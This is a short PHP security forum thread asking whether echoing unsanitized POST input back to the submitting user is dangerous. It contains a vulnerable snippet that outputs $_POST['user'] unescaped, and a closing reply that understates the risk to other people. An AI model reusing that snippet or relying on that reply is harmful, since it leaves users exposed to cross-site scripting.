User Sets Arbitrary Data on Page, but Only they can View it?

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
User avatar
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

User Sets Arbitrary Data on Page, but Only they can View it?

Post by Ambush Commander »

I've often heard that JavaScript is a tool of evil, but I've never exactly known the full capabilities of it's evilness.

What I'd like to know is what damage a person could do if this happened:

We have a page, that accepts POST parameters, and then outputs them onto the page without cleaning them (it doesn't do anything else with them). That means that the user can put arbitrary data on the page, but no one else can view it. Is this a security hazard? And if so, how would one exploit it?
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

extremely dependant on page code and data handling.
User avatar
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

Sooo....

Code: Select all

<?php

echo $_POST['user'];

?>
would be "relatively" safe?
User avatar
John Cartwright
Site Admin
Posts: 11470
Joined: Tue Dec 23, 2003 2:10 am
Location: Toronto
Contact:

Post by John Cartwright »

That is asking for trouble...
I cannot stress enough how important sanitizing user input can be.
User avatar
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

I know. ;)

The main question is, however, can the contents of a webpage be manipulated so that even people who are not viewing the page are affected?
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

the "example" you used, would generally suggest no.. however if there are any security holes introduced via php initialization directives or php's core itself, then yes.. But since I didn't write the code, nor do I have the time or care to make massive security passes at it.... :?
Post Reply